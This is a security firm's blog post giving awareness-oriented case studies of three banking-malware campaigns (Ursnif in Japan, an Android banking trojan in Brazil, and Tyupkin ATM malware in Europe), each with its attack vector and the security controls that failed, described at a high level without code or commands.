The Curious Case of Banking Frauds — Malware — Part 1

Arun Thomas
Nov 3 · 4 min read

This article is part of, “The Curious Case of Banking Frauds” series. This is a set of case studies published by NetSentries Cyber Threat Management Team on the various banking frauds committed, to make aware of the necessity of intertwining security as part of the business strategy, to better the overall security posture of a financial institution and its associated service components.

1. Ursnif Banking Trojan — Japan

Breach Reported in: 2019,2018
Target Location: Japan
Initial Threat Vector: Phishing

In the past few years, the rate of cyber-attacks is leaping up. Day by day it is getting broad and evolved. The latest victims are “Japanese banks” which encountered malware attacks on “12th March 2019”. A malware known as Ursnif Trojan is used to steal the credentials of clients from banks.
Japanese banks are getting targeted for the past few years by Ursnif’s operators. A similar kind of malware attack was executed by Ursnif in 2018. They mainly used Dreambot variant for this attack. In “2019” they have used a different variant which is much focused on stealing data from emails.
Ursnif malware is one of the most extensive and effective malware which is used to credential-stealing purposes. This malware is enhanced with the modules which target banking security products like Phishwall, etc.
The attack is executed by sending a phishing email to the victim. This mail consists of malicious attachments, typically an excel spreadsheet. This sheet includes an “Enable Content” button and pressing this button will lead you to some embedded macro codes. These codes possess PowerShell commands and will start downloading it.
Ursnif has developed the new variant with crafty persistence techniques. They worked on minimizing the digital footprints and fend off maximum cyber security gateways. It is also embedded with potent information stealing modules focused on emails and digital-wallets.
Ursnif malware attack on Japanese banks lead to financial damages globally and caused losses of tens of millions of dollars for individuals. They have planned a localized attack strategy targeting only Japanese users. Cybereason has conducted several investigations on location and language settings to find out this information.

Failed Security Controls:

• Social Engineering and spear phishing awareness
• Content Security Gateways
• Endpoint Security solutions

2. Brazilian Mobile Malware

Breach Reported in: 2018
Target Location: Primarily Brazil
Initial Threat Vector: Rogue Mobile Application

In 2018, Brazilian people became the victims of an android-based malware attack. More than 2000 mobile banking customers get affected by this attack. Unknowingly these people downloaded the malware which led to the loss of confidential data.
The Trojan used for this attack was Android.BankBot.495 and it is shared through Google Play store. This malware is designed to get access to Android accessibility features. Once your device gets affected with this malware, it will continue to work in the background. It will also auto-tap the buttons and steals credentials from the opened applications.
According to research conducted after the attack, it is found that the Android.BankBot.495 access your account information from the application. Then it makes attempts to auto-login with the credentials got from the command and control server.
This Trojan can access your bank account balance through the private banking data. After accessing all these, it will automatically transfer the amounts to cyber criminals. This has been found out after the analysis conducted by cyber security analysts on Bradesco one of the largest private bank in Brazil.
Android-based malware is not only designed to access the online banking application. The Trojan overlays the android display window with a malicious web page by simulating the respected application. Then it will automatically enter the credentials of the user.
From this Brazilian mobile malware attack, it is clear that the Play Protect feature of Google Play should be improved to the next level.

Failed Security Controls:

  • Social Engineering and spear phishing awareness
  • Brand Monitoring of App Stores
  • End User Security Awareness

3. Tyupkin ATM Malware -Europe

Breach Reported in: 2015
Target Location: Primarily Europe
Initial Threat Vector: Bootable CD ROM

On October 7th 2014, a malware known as Tyupkin has attacked across Europe and led to considerable financial loss. More than 50 ATMs had been infected in Eastern Europe and cybercriminals have made millions.
The Tyupkin malware is installed physically on windows-based ATMs across the country. The malware enters the codes automatically into the machines and withdraws the cash. European authorities were managed to dismantle the crime ring very effectively.
All the infected machines are manufactured from the same manufacturer which uses a 32-bit version of Windows OS. The cybercriminals targeted the cash machines manufactured by NCR which is a globally renowned ATM manufacturer.
The infected cash machines had CD-ROM functionality with a universal key to lock and open. The malware is installed using a bootable CD. The Trojan works only on weekends and will self-destruct afterwards.
The attackers had brilliantly designed the malware that the key to access the malware is randomly created for each time. This made it almost impossible to access the malware from outside. After the malware starts running, they were able to withdraw forty notes each time form each machine.
The gang managed to rob the cash machine until the security companies started tracking them on January 2015. The ATMs running with windows OS having less security features and also without outside security is vulnerable even now.

Failed Security Controls:

• ATM Security Module

The Curious Case of Banking Frauds

Arun Thomas

Written by

Chief Operating Officer at NetSentries Technologies

The Curious Case of Banking Frauds

This is a set of case studies published by NetSentries Cyber Threat Management Team on the various banking frauds committed, to create awareness of the importance of interweaving security with the banking infrastructure.

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade